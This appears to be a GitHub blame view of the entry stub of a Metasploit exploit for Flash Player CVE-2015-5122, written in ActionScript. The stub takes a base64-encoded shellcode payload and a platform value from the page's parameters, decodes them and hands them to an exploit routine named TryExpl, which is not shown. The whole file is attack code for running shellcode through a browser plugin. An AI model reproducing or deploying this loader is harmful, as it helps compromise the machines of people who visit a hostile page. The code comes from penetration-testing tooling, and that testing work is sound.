Files
metasploit-gs/external/source/exploits/CVE-2015-5122/Exploit.as
T

Ignoring revisions in .git-blame-ignore-revs. Click here to bypass and see the normal blame view.

34 lines
979 B
ActionScript
Raw Normal View History

2015-07-11 00:28:55 -05:00
package
{
import flash.display.Sprite
import flash.events.Event
import mx.utils.Base64Decoder
import flash.display.LoaderInfo
import flash.utils.ByteArray
public class Exploit extends Sprite
{
private var b64:Base64Decoder = new Base64Decoder()
private var payload:ByteArray
private var platform:String
public function Exploit():void
{
2015-07-16 14:56:32 -05:00
if (stage) init();
else addEventListener(Event.ADDED_TO_STAGE, init);
2015-07-11 00:28:55 -05:00
}
private function init(e:Event = null):void
{
2015-07-16 14:56:32 -05:00
platform = LoaderInfo(this.root.loaderInfo).parameters.pl
2015-07-11 00:28:55 -05:00
var b64_payload:String = LoaderInfo(this.root.loaderInfo).parameters.sh
var pattern:RegExp = / /g;
b64_payload = b64_payload.replace(pattern, "+")
b64.decode(b64_payload)
payload = b64.toByteArray()
2015-07-16 14:56:32 -05:00
removeEventListener(Event.ADDED_TO_STAGE, init);
MyClass.TryExpl(this, platform, payload, 1)
2015-07-11 00:28:55 -05:00
}
}
}